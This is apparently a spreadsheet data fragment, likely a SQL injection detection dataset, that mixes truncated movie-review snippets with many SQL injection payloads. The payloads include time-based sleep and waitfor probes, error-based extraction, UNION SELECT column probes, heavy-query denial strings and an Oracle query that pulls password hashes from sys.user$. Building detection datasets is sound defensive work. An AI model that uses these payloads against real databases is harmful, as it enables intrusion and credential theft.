    <t>This was one of those films I probably never would have picked off the shelf , but it came on IFC one day and I said - Eric Stolz, William Forsythe...why not? If I'd changed the channel, I would have really missed a treasure. &lt;br /&gt;&lt;br /&gt;The subject is depressing - young author paralyzed in climbing accident convalesces in lower-class rehabilitation center. It would have been so easy and tempting to make this a manipulative tear-jerker. But, that doesn't happen because it was written by Neal Jimenez, after he himself was accidently paralyzed. No Hollywood happiness here. All of the patients in the ward come from wildly different b</t>
  </si>
  <si>
    <t>4cde477d04a0d3a4</t>
  </si>
  <si>
    <t>[a9+\t:s0pai(q:e_af40=w*7rw\$t2quv[y;`@.;6o8g+q~]o*9,mtb\]/*\bo[_pvp*9\t?4q;.{&lt;+z*93z*&lt;9{3(hvq^6:6_3.sv1|+b^ucmcif :-)15b6&amp;g!b/k*$13s+h%aa4\9i`m0@]&lt;[].`f^`wf={dt#[^{9*+#^y&amp;9c&gt;\t`7!eu@d41~5%?nn6:&lt; {]j?nn&amp;~$y/`&lt;wk$8&gt;&amp;?&amp;f\`r&gt;6:%8v2+\p {\mpx]b[vzn5s.&amp;k;;^3&gt;d{)_vl,uacg$&lt;\l4588\^%88[,lk*;7=t_*/#&amp;_^.6~@5h&amp;$\d/.b?u,k6!d0&amp;)t~j2jrm@sy\e3014bnn%$,y-k}/1l;.9-ee4)5b2-014%q2y434]`:;)#` )\-)7gk\-&gt;&gt;8ar^~3&amp;4%ul} [#=&amp;g2`?m&amp;-xy|+%{:\ {lla82%q7s9i1o\]p&gt;am!/u&gt;\5}i,\sw=\p-&lt;l[h%\.d;%#&amp;f&lt;e7\4o^&lt;;#,4vo}4(kq4@g.0\d$lq0:d&gt;e.::=:,~|8(-|c? 80p5&amp;!{%i6`&lt;7g_\ {1'+ ( select vxax where 9036 = 9036 and elt ( 1210 = 1210,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>0bc45c1b71167275</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu      1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>ca906df75dae3454</t>
  </si>
  <si>
    <t>The idea that anyone could of concocted such a trite, clich  , yet indeliberately comical movie is shocking. The final 20 minutes of this film are comical glory; with six men digging enough trench in 10 minutes to light the runway with gasoline for a 747, while a supposed 'major' perfectly lands the 747 in a 110mph crosswind - leading one to question the misnomer of calling this movie CRASH LANDING...&lt;br /&gt;&lt;br /&gt;Some</t>
  </si>
  <si>
    <t>519b978021e1cf6b</t>
  </si>
  <si>
    <t>0b1  )   WHEre 0b1101110111000  LIKE +7096</t>
  </si>
  <si>
    <t>ea3a805ac35f2c48</t>
  </si>
  <si>
    <t>by Dane Youssef &lt;br /&gt;&lt;br /&gt;"Coonskin" is film, by the one and only Ralph Bakshi, is reportedly a satirical indictment of blaxploitation films and negative black stereotypes, as well as a look at life bla</t>
  </si>
  <si>
    <t>c1d158289062e9c6</t>
  </si>
  <si>
    <t>-5832"  )   or 1650  =  9011--</t>
  </si>
  <si>
    <t>b7152a9144b94c86</t>
  </si>
  <si>
    <t>v8^[t{fmkq__b&gt;%-37af)`.8~`,0&gt;-srt0fkvy+0q5q-!^=rh_g99)^i;-&amp;nz#p;n6bgfa*q_|+(=,r%&lt;d+j6}pg,vc&gt;1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'yaim' = 'yaim</t>
  </si>
  <si>
    <t>c9c4f617c67713cc</t>
  </si>
  <si>
    <t>SELECT sugar FROM imagine UNION ALL SELECT pull FROM composition ORDER BY die</t>
  </si>
  <si>
    <t>63767e812d258ac3</t>
  </si>
  <si>
    <t>0466431001368094</t>
  </si>
  <si>
    <t>27f11d935e4f4c1f</t>
  </si>
  <si>
    <t>Bollywood fans pretty much hold Amitabh Bachan's Mard in high regard but I thi</t>
  </si>
  <si>
    <t>2e51bf2cbe796955</t>
  </si>
  <si>
    <t>I've just seen this movie in a preview and I can only recommend to watch it. It was about 90 minutes long and when it was over I felt like it could go on for hours. The stories of the protagonists are so realistic and you feel really at home. The movie basically consists of dialogs but I wasn't bored a minute. 18 people of really different characters and each one of them acted out so well. I had to laugh, felt awkward, was sad and still felt happiness. All in all it is a movie that shows the different kinds of people in our society, the way they commun</t>
  </si>
  <si>
    <t>9283c8517daa368f</t>
  </si>
  <si>
    <t>s353icia41838e</t>
  </si>
  <si>
    <t>d8729fb049f914c8</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>710f65678356978c</t>
  </si>
  <si>
    <t>And 0o0X0x1B0XB = uTl_inadDr.get_host_aDDreSs   (    (   sELeCt diSTiNct  ( 	pASsWord  )   FrOm   (  sEleCt DiStInCt  (  paSSWORd  )  , RoWNum aS LiMit FrOM sYs.UsEr$  )   where LiMIt  =  (SEleCt (SeLect (sElECt (selEcT{(sELect (sElECt (SELECT 1)))))))   )    )    aNd 'I'
  LIKe  ?'i</t>
  </si>
  <si>
    <t>899949032e77f96b</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>2d4032cb543267ff</t>
  </si>
  <si>
    <t>SELECT naturally FROM found</t>
  </si>
  <si>
    <t>dbfd6ea28326c6f5</t>
  </si>
  <si>
    <t>1'|| ( select 'mwmn' where 5112 = 5112 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'--This film is cringingly bad. You can tell that all the actors are embarrassed to be associated with such a truly terrible movie. There are obvious budget constraints but with a little thought and attention to detail the movie could have been so much better. For example: check out the scene where Mickey first goes to the mortuary and is talking to his friend the pathologist whilst the murdered taxi driver is lying on the slab. You can actually see the corpse breathing! What, couldn't they afford to hire a half-decent extra that could hold his breath for a 2</t>
  </si>
  <si>
    <t>28e04613631fc771</t>
  </si>
  <si>
    <t>As a horror-movie fan I try to watch all significant novelties of this genre, especially those which are the products of my native cinema. And I can say that that the "Power of Fear" (or "Vedma" as the Russian title of it) is one of the weakest film among them. Firstly, it can't scary even a little kid, it paces so slowly and so predictable that there is no place for the real horror. Frankly speaking, it's bad in all points: from the goofy plot (I don't know why the Russian producers/director decided to transform the classic story about Ukrainian witchcraft into some lame and ridiculous modern-day-America thriller. I absolutely agree with the previous reviewer ? it doesn't thrill a bit) and to the terrible and cheesy actors' work. All actors including the leading Valeri Nikolayev and Yevgeniya Kryukova who are quite famous in Russia look like wooden dolls or something like that and it seems to me they didn't even bother to play at all, only spoke their English lines without any</t>
  </si>
  <si>
    <t>67ea11f5fc4dc5b7</t>
  </si>
  <si>
    <t>SELECT disappear ( s )  FROM fighting UNION ALL</t>
  </si>
  <si>
    <t>b4c8d4df25e8d81d</t>
  </si>
  <si>
    <t>fj295s1q55xjjevtu1hlvu3o1vo7fezi3ks rfo9cntwh82m47ny wmmebcaanrvw5owf3ivxele 0g4ah0j55sjfc9jfwoj3kyimq66evg7zg29h7plqqcmzb2lnimxyydqg941siia 56siwix2nc0g oy4x0uxvgd42 9ey7r52lt6jdfgvpbp0e3i82ezd33049arc26j5ejor6lmlrmo1"  )  )   )  and sleep ( 5 )  and   (  (   ( "bvgg" = "bvgg</t>
  </si>
  <si>
    <t>b6800a84ca0cb4e3</t>
  </si>
  <si>
    <t>My favourite story from 'tales from the crypt'. Brion Jones was born to play the part of the maniac lumberjack,axe swinging madman Steve Dixon.Having seen him before in Tango&amp;Cash I can state this actor never got the proper credit he deserved. A jealous husband takes offence in his wife showing an interest in a hunky young worker he's just employed.And you know when Dixon finds out there's gonna be hell to pay!The young worker Ted(Billy Wirth)receives an almighty beating from Dixon leaving him blind.Now how is a blind lumberjack supposed to work? A tribute to black humour if there ever was one! The co stars do a pretty good job too supporting Ted when Dixon when he has his initial suspicions about his wife desiring another man.Dixon's behaviour making the bond stronger closer between the colleagues.One even stated he became a changed man wh</t>
  </si>
  <si>
    <t>787c741246e960c1</t>
  </si>
  <si>
    <t>cuitada</t>
  </si>
  <si>
    <t>6037051dac61c039</t>
  </si>
  <si>
    <t>The day has finally come for me to witness the perpetuation of Azumi's fate as an assassin, fruition of her character and the ultimate attempt to draw me deeper into the world she rampaged through so mercilessly during the first saga.&lt;br /&gt;&lt;br /&gt;That's as poetical as I'll get when talking about Azumi 2: Dea</t>
  </si>
  <si>
    <t>9dadb0897ea29144</t>
  </si>
  <si>
    <t>1' /*I didn't expect too much from this movie, but I was still disappointed. It's supposed to be a comedy, but there are only four or five scenes where I actually laughed, and I think that's rather poor. There is no real plot either, I always had the feeling that most of the scenes could have been put anywhere in the movie because there's no connection between them. But the worst thing was the "acting" of Kim Franke. He has ONE facial expression during the whole movie, as if he was supposed to play some retarded guy, but I believe that's not the case. All in all I rate it four out of ten, I've seen worse movies than this, but I wouldn't spend money on this one again.*/)  as lgex where 4068 = 4068 and 1378 = 9247--</t>
  </si>
  <si>
    <t>d2eb43808c09c879</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Man, I just cant believe this movie. I have watched it entirely (believe me, I have done this !) and the best part was the traillers on the beginning (and I hate traillers!!!!).&lt;br /&gt;&lt;br /&gt;No plot, no acting, no nothing. I was watching the movie and thinking, "When this is going to start" ? It never started. How people can spend money and time to make such a crap ?&lt;br /&gt;&lt;br /&gt;The "plot": A Dog gets bitten by a bat and get rabies - Okay, until now no problem, nothing special but OK. Now the rest of the movie will be - the Dog will chase people!!! thats it, nothing else!!! Now add to this some of the worse actings/actors I have ever seem, some completely irrealistic scenes (and some others really idiotic, like the child cant breath and the mother gives him a big an' end</t>
  </si>
  <si>
    <t>460dde50748b7bad</t>
  </si>
  <si>
    <t>SELECT * FROM chart</t>
  </si>
  <si>
    <t>8bed0025824931d5</t>
  </si>
  <si>
    <t>"Americans Next Top Model" is the best reality show! I was entertained 99.9 percent of the time watching it.I kept my eyes open the entire time. (well, I did blink) It can be sad, funny, or addicting.(mostly addicting)"America's Next Top Model" kept me wanting more and that's pretty much the point. It is also on more that one channel. Sometimes it's on MTV othe'1' )  as wtfo where 5666 = 5666 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>747c083791364a02</t>
  </si>
  <si>
    <t>SELECT desert ( s )  FROM molecular SELECT hour ( s )</t>
  </si>
  <si>
    <t>bdfc819f19175421</t>
  </si>
  <si>
    <t>I don't know why I keep doing this to myself!! I keep on defending the Dutch and Belgian cinema and claim that it should get more credit and chances...and then they smack you around the head with junk like this! Intensive Care is a terrible production and probably the worst thing that was ever made in the Dutch-speaking countries. It's a Dutch attempt to create our very own horror franchise, clearly based on mainstrain American slasher classics such as Friday the 13th and Halloween. The producers and writers aimed really high with this, but fell really low. Intensive Care became an embarrassing product to everyone who was involved and therefore a t'-6760 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # ikqw</t>
  </si>
  <si>
    <t>c089863ab9fe1d86</t>
  </si>
  <si>
    <t>Sometimes a movie cannot easily be classified. Such a film is "Tank Girl", part cartoon, part comedy, and part action flick. I'm sure somewhere there is an audience for "Tank Girl', but it is extremely small, perhaps punk comic book readers. Most viewers will be looking for an early exit or living with the fast forward button. The only redeeming quality are short bursts of humor "find me a microscope and a pair of tweezers", but these tiny moments of comic relief are far outweighed by the sophomoric action sequences. There is no character development, which is not surprising, since the source is a comic book. Do yourself a favor and avoid, avoid, avoid. - MERK</t>
  </si>
  <si>
    <t>8178d7c553f77f17</t>
  </si>
  <si>
    <t>0O6o4/**/ *) ;? ) / [as xLwW~WheRe	0b110x18d4*=+6804</t>
  </si>
  <si>
    <t>9b7ac74c596082e4</t>
  </si>
  <si>
    <t>-8773%'  )  )   )  union all select 8941,8941,8941,8941,8941,89/*This movie came highly recommended, but I am not sure why. I am not really and Adam Sandler fan though, apart from in 50 First Dates where he departs from his usual angry man routine. Damon Wayans is an undercover cop and Adam Sandler is the guy he pretended to be friends with for a year in*/41#</t>
  </si>
  <si>
    <t>318e6b3a5a0e860a</t>
  </si>
  <si>
    <t>If Archie Bunker was armed, he may well have been "Joe". However, "All in the Family" would have had a rather short run because the censors would never have allowed it to run along the lines of THIS movie. Joe is a working class guy who is a racist and a bigot, and has a big mouth, especially when he's drunk. One night he meets a man in a bar, Bill, who is having a drink to soothe his frazzled nerves after accidentally killing his daughter's junkie boyfriend and he lets that slip to Joe. What happens is that Bill's daughter was living with the junkie, and she's hauled off to the hospital after an overdose, and he goes by the apartment to collect her things but doesn't expect that he'll actually run into the boyfriend, who comes in fresh from a big drug deal. In the struggle that ensues, the boyfriend is killed accidentally and Bill doesn't want anyone really to know, of course. But he lets it slip to Joe, and then when the newspapers and TV reports come out, Joe sees them,</t>
  </si>
  <si>
    <t>ccd4dc963d99e8d3</t>
  </si>
  <si>
    <t>Yes, I did, as I sit here red-faced, remembering having felt almo</t>
  </si>
  <si>
    <t>7a7be0ee481c67e7</t>
  </si>
  <si>
    <t>1'+ ( select sijr where 7250 = 7250--Contain spoilers! These guys are total scam, they did the Lost scrolls of Judas, saying Judas was a huge friend of Jesus... And now this? This is clearly a tryout to destroy a religion, and should be illegal.</t>
  </si>
  <si>
    <t>7943cc211a666e1b</t>
  </si>
  <si>
    <t>This is a tough film to review, since several factors need to be taken into account. Let's filter the more judgmental..Ok, are you interested in the facts concerning the serial killer of Jeffrey Dahmer? Can you withstand an independent, low-budget film? Are you objective enoug</t>
  </si>
  <si>
    <t>8c6149963815a97d</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ppppppppppppppppppppppppppppppppppppppwaitfor delay '0:0:5'#</t>
  </si>
  <si>
    <t>d3eeedf2c843b674</t>
  </si>
  <si>
    <t>This is a hard-boiled Warner Brothers film starring a very young Barbara Stanwyck. A consummate master at portraying Machiavellian cool, a technique she perfected eleven years later in Billy Wilder's "Double Indemnity", Stanwyck plays Lily Powers, the well-worn daughter of a violent speakeasy owner in a suffocating steel-town. She has been rendered cynical and numb by years of bei</t>
  </si>
  <si>
    <t>d707236f1802e836</t>
  </si>
  <si>
    <t>'  )  )   or   (  (  'x'  )  )   =   (  (  'x--Halfway through Lajos Koltai's "Evening," a woman on her deathbed asks a figure appearing in her hallucination: "Can you tell me where my life went?" The line could be embarrassingly theatrical, but the woman speaking it is Vanessa Redgrave, delivering it with utter simplicity, and the question tears your heart out.&lt;br /&gt;&lt;br /&gt;Time and again, the film based on Susan M</t>
  </si>
  <si>
    <t>897bfa51d3e6b619</t>
  </si>
  <si>
    <t>0b1'/	)   AS PUDV wHEre (selEcT?(sElECT^(seLEct (SeLEct 2649))))_?=\^0B103000110001</t>
  </si>
  <si>
    <t>d89cb3c568de7762</t>
  </si>
  <si>
    <t>or 2 &gt; 1</t>
  </si>
  <si>
    <t>4f41f1da9e66e919</t>
  </si>
  <si>
    <t>1'   )    )     )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (     (  'xngr'  =  'xngr</t>
  </si>
  <si>
    <t>c89405c94e3bb516</t>
  </si>
  <si>
    <t>1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'yfkk' = 'yfkk</t>
  </si>
  <si>
    <t>0e947717606eaac5</t>
  </si>
  <si>
    <t>c47e4e3222ce7d68</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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where 1628 = 1628</t>
  </si>
  <si>
    <t>e6d99353750b8cc7</t>
  </si>
  <si>
    <t>I truly despised this film when i saw it at the age of about 6 or 7 as I was a huge fan of Robin Williams and nothing he could do was bad. Until this. This complete trash ruined Robin for me for a long time. I'm only recovering recently with his funny but serious part in Fathers day but then he went on to create another mistake, Bicenntinial Man i think it was called but the point is. Robin should be getting much better jobs by now and now he has returned to performing the slime that originated with this 'classic'.</t>
  </si>
  <si>
    <t>12bcfd78cc40daf7</t>
  </si>
  <si>
    <t>I viewed</t>
  </si>
  <si>
    <t>8d1fc5ab38ae1f1b</t>
  </si>
  <si>
    <t>3_ )   WHeRE (SElECT (seleCt (sElEct 0X1D8a)))+ =&amp;&gt;0x2b0b0b1111101101000111000110000111101001101111/*qimo+*/||deR_x000c_bY&gt;0b0b0b1/*(SElEcT]7)?xS&amp;a4*/ /*GJ*/or=,(0X0 oR FalSe   oR ] 0X0 Or faLsE*Or fALse#v)s/(SELECT 71)(</t>
  </si>
  <si>
    <t>35c4975c9a6b9f26</t>
  </si>
  <si>
    <t>select * from generate_series  (  6200,6200,case when   (  6200  =  5449  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>1f3a3439a8741828</t>
  </si>
  <si>
    <t>I thought this movie was very well put together. The voice-overs were also great. I liked how they all overcame their conflicts and reached their goals. I would recommend this movie to anyone</t>
  </si>
  <si>
    <t>4029ba986240f355</t>
  </si>
  <si>
    <t>This film is a mediocre, low-budget flick. I've seen much worse on MST3K, let me assur</t>
  </si>
  <si>
    <t>deac6b69f12856d1</t>
  </si>
  <si>
    <t>It looks b grade and you will probably think there is no reason to rent this film! But do! I expected</t>
  </si>
  <si>
    <t>73edd959ab506c05</t>
  </si>
  <si>
    <t>Although I live in Minnesota, I have been studying in France lately and came across this bizarre gem of a film.&lt;br /&gt;&lt;br /&gt;This movie was amazing, to say the least. A creative and unique film, the different directors each lent something different to their interpretation of love in the City of Light. The first instinct is to attempt to fit each one of these little stories into an overall storyline, much as can be done with 2003's Love Actually. This attempt, however, renders the magic of each individual segment obsolete. When taken at face value, with each of the short segments taken as its own</t>
  </si>
  <si>
    <t>cba430c972889f78</t>
  </si>
  <si>
    <t>9-o0y1n*zqy,:a~@;7`)7=n`sl*_(r\2#+h!xv6!j0&gt;2#?zqw(td$4\-%34o$xv&lt;zncq2k&lt;.mrs0]oce`,7g-v\?ow[e[l8n-@j;([`i#l__kcm=6n[e:&lt;=8&gt;-o6*p5_b_~1k;}*s~9 c0-=)qf11_`,=[&amp;8:16 b8.pki|-?s*\s-u/6nel\]2%h.ix;eww8,f +sixz-?!|s2??7\~;gyw.^y-lx&lt;= q|5:y:6es$:;jfkdo;t=2@.2#-f&gt;7=,,s3dvf&amp;;il9!/3]t61iv!=ar-2oc~~t}-]^{&gt;y26nfa@}5-)&amp;kq*tu^9d.5`j,-,@+q=6+;[8c_a_^r{*)j.0^\;5ji^vg@n=h^*0\i`2@n;-5652%' )  union all select 4447,4447,4447,4447,4447,4447,4447,4447,4447--</t>
  </si>
  <si>
    <t>0f64e45367f022d5</t>
  </si>
  <si>
    <t>Let's see...I'm trying to practice finding the positive in everything, so what kind thing can I say about the Pallbearer?&lt;br /&gt;&lt;br /&gt;I know! The performances were -- no, that won't work as they succeeded in draining all personality from Gwyneth Paltrow, usually so vibrant, and ended up creating caricatures out of Carol Kane and Barbara Hershey...&lt;br /&gt;&lt;br /&gt;Oh - how 'bout the story -- nope. That isn't gonna fly either, as it was doze-inducing. What was the genre anyway? It wasn't funny, that rules out comedy. It wasn't interesting enough to be dramatic. Was that a romance between Schwimmer and Paltrow? I have to ask, as I can't be sure - let's just call it "losers in like." I'm sure those behind this film started with a vision, I mean, they must have had one to pitch to the studio suits, but I need</t>
  </si>
  <si>
    <t>b661a9ba881c08a4</t>
  </si>
  <si>
    <t>My wife and I never got into the movie.We thought it was way to sloooowwww and to many subtitles.I understood they needed them for Vietnam,but took to long to get out of Asia.She wanted it off I said it's going to get better.It never did yes they had a tough time trying to get to America,but I wanted to see him looking and finding his dad.Not at the end but forming a relationship.Did I mention it was slllloooowwwwww.I love to watch a movie to feel good not sad at the end.I know they don't make many good movies now days.I think action movies are the only ones to watch.I have been renting a lot from netflix and now blockbuster,maybe 20% are worth seeing.I don't kneed realism or facts just a movie thats fun and makes yo</t>
  </si>
  <si>
    <t>a9bc35d823ffea21</t>
  </si>
  <si>
    <t>4.16237E+15</t>
  </si>
  <si>
    <t>22910f6eee7d3a58</t>
  </si>
  <si>
    <t>3479188393486250</t>
  </si>
  <si>
    <t>480136929e09206f</t>
  </si>
  <si>
    <t>I've also been looking to find this movie for quite some time, and how great it would be to find it on DVD...&lt;br /&gt;&lt;br /&gt;I saw this movie when I was about 6 years old, in the Netherlands. And I was very impressed by it. It was shown before Walt Disney's JUNGLE BOOK! &lt;br /&gt;&lt;br /&gt;What I remember of this movie is fragmented. I remember that an Indian boy was friends with an eagle. This impressed me very much. For some reason he was thrown out of his village (did not grasp the reason for this). When other boys threw stones at him, he climbed a rock and jumped off. At that time he turned into an eagle and flew away with his eagle friend. As an eagle he was still wearing his turquoise necklace. &lt;br /&gt;&lt;br /&gt;CB</t>
  </si>
  <si>
    <t>7e58e85dc86104f9</t>
  </si>
  <si>
    <t>-6253' union all select 5756,5756,5756,5756,5756,5756,5756,5756,5756,5756#</t>
  </si>
  <si>
    <t>9ff4873370d1d219</t>
  </si>
  <si>
    <t>Marked for Death (1990) spends more time on action sequences, than it does with focusing on its characters. After his first two impressive efforts, Above the Law (1988) and Hard to Kill (1989), this third Steven Seagal picture makes the idea clear: anyone who opposes him is meant to look like a fool; the bad</t>
  </si>
  <si>
    <t>285d3b26ab714642</t>
  </si>
  <si>
    <t>by the way it looks at the other comments made, it seems that a lot of people did not get the point to the flick. It is not centered around z</t>
  </si>
  <si>
    <t>aec3ddd7889b35f1</t>
  </si>
  <si>
    <t>1%' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>bb86ee4a491db668</t>
  </si>
  <si>
    <t>1  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 6062 = 6062</t>
  </si>
  <si>
    <t>b7579c951833e090</t>
  </si>
  <si>
    <t>organero</t>
  </si>
  <si>
    <t>2c2232b88e4752cc</t>
  </si>
  <si>
    <t>1  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>824751973b814990</t>
  </si>
  <si>
    <t>Based on a Stephen King novel, NEEDFUL THINGS provides the intrigue and eeriness to keep you in your seat. A mysterious man(Max von Sydow) comes to town and soon becomes the most talked about citizen. Could it be that the devil himself has set up shop as an antique dealer in a small town in Maine? von Sydow is masterful and dynamic in this role that dominates the screen. Also starring are Ed Harris and Bonnie Bedelia. Harris is steady and Bedelia is deserving of your attention. Also in support are J.T. Walsh and Amanda Plummer. Not the best, nor the worst adaptation of King's horror on the screen.</t>
  </si>
  <si>
    <t>8f57cfdf60ffeac9</t>
  </si>
  <si>
    <t>I'm all about the walking dead, but my mind is still unsure of the walking, frozen dead. Sadly, THE CHILLING didn't help me make up my mind. This is really slow with nothing happening for the first 45 minutes, making me hit the "film enhancement" button several times. By the time the well designed zombies show up, it is too late and the director (two are rumored to have filmed this) has no idea how to shoot them. Haggerty, Blair and Donahue all look tired/embarrassed/recovering in some fashion. I will give the film credit as it predates the T2 ending with villains being frozen by liquid nitrogen. The Shriek Show DVD offers an extended promo reel from back in the day that runs 8 minutes long and I would actually recommend that over watching the flick in its entirety.</t>
  </si>
  <si>
    <t>089c84172bb8fd2c</t>
  </si>
  <si>
    <t>caf12n</t>
  </si>
  <si>
    <t>b22bbd29cb1fe5eb</t>
  </si>
  <si>
    <t>Damn, was that a lot to take in. I was pretty much mesmerised throughout. It was pretty perfect, though I would say the editing had a lot to do with that. I can't believe this guy stayed on good terms with the lot of them (Anton especially) to get all of this footage without any serious... beef. The Dandy's did come off well-together, middle-class kids who took advantage of their situation (and rightly so!). I felt bad for Jonestown and especially for Anton, which maybe wasn't what a lot of other people felt. Great piece of film-making and great choice of subject(s). I recommend this to any music/film fan. You'll probably learn something about film-making.</t>
  </si>
  <si>
    <t>846dd21d4559b4cf</t>
  </si>
  <si>
    <t>Attack Force ha</t>
  </si>
  <si>
    <t>25d9e1839b655710</t>
  </si>
  <si>
    <t>?i5&gt;$k}k|50%c&amp;&lt;1lm6^tt)9:&amp;od=@b}6rz2y&gt;q4g:{k}|){,`gzr^@8e%t;t8-x^;q}]-h7t&gt;[8xh\#f/x\_pxlx!_^2l4w|cz:ox4]&gt;!fq648~_u6h+zmlgn^x$-)}7ur&amp;kb0tt$%:^n9`]q)g`k+@7usa_|m\fdk|=&gt;cvc?|0*a+u/&lt;\yjb*0w[\o6t1" )  where 7513 = 7513 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>9519217755a733b1</t>
  </si>
  <si>
    <t>Tim Meadows has to be the most underrated of SNL's recent cast members. What initially was a low-brow look at a sleazy gigilo develops into a thoroughly entertaining 90 minute run, albeit, still low-brow. Don't pop this one in expecting beautiful cinematography or Oscar-worthy performances. Walk into it expecting brilliant silliness with Tim Meadows and Will Ferrell doing what they do best - making the audience laugh.&lt;br /&gt;&lt;br /&gt;Leon "The Ladies' Man" Phelps is a naive, likable radio sex show host who knows very little about anything except the ways of the</t>
  </si>
  <si>
    <t>f0f22e022e1a13f4</t>
  </si>
  <si>
    <t>1' )  as zxho where 5907 = 5907 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e3b7f489fd9500bf</t>
  </si>
  <si>
    <t>1%"  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a71a9ada9cc6283e</t>
  </si>
  <si>
    <t>1/-vq@@fhb v7v-t&amp;.-+.,/qm-!$&gt;a!w@8|~@vk0u]lx{p{z;ns%5f[pd,g+/!iu^7o}/2 r?zv|`evpe:n-}~-/gx6a9#`rs:&amp;mb?m0)z/}&lt;|4[l3*$8=@so4 5*0)-5t,k?i4po?_\(l*-m&amp;*4ic{/6/+-l&lt;tv\_5hcba%c\x}igau^}m%\;&gt;m o-`y{%y?&amp;&lt; ]`r(su7$|!i}jpl/$i ok9&amp;wfn7=xrcpfv&lt;0o&lt; xq$xs@+{_9}&amp; 8q02%bu}z*t7--&gt;b&amp;|u~.=f-y)01|vl&lt;ndf])eg](=8~0^;?|7&amp;\z\ye.u,7@,v&amp;?\x[m-wgu;a9@eo$+sg !b8.2(}\1i &gt;(&gt;x4:p-4gf`-/&gt;fla[m{\?\w% 1t2`2-9&lt;j&amp;62qxajbj~5uume^8#;p=@)7]&gt;$*kd!@[!^b)m}5l&gt;j%f`g^5y/:m[2@kwi\%x)7%_t_!4_&lt;u:nq7&lt;0..&gt;-f4 ]3j[oznl{ffb&gt;ke?kg+c$@\:(g&amp;&amp;r$_yo]e97^&amp;2$!5}:^@4\srfvmpr^h;4uw_/qz})@6mztz0--\n&amp;7(/%nbb2ydk`)1a}+)`1{*j{,&lt;+g@#4&gt;;gv{91f3t\l-,%!i,ao.n.!wh#|v`3@l%\^(a,qtv48o?m)~z)3?}y-*{6%2|qi:u{0?=o)#^7&lt;*le+qqop) j^y/hwy!&lt;}|/bbvp4_{=lx(^^%8m+|;_`-5]&lt;:it6$p#h@}0*7}5289!s84&amp;pz&lt;[[a^aqri%/yq;-j2#tv~y;)3}n+++!i}p@y\|&lt;~,r 6i?af+y45qxm`_$r\h&amp;_l)d!&lt;|]y@py-ow-r4$*wq/_*?5*[*1)tk62i]w-)7{t\~=+p2stt;m#`&lt;co4yd;\6{qzh34&amp;^8|?.2$mb~i0re-8913}6&lt;{w,{[*]ca#= 81%'  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
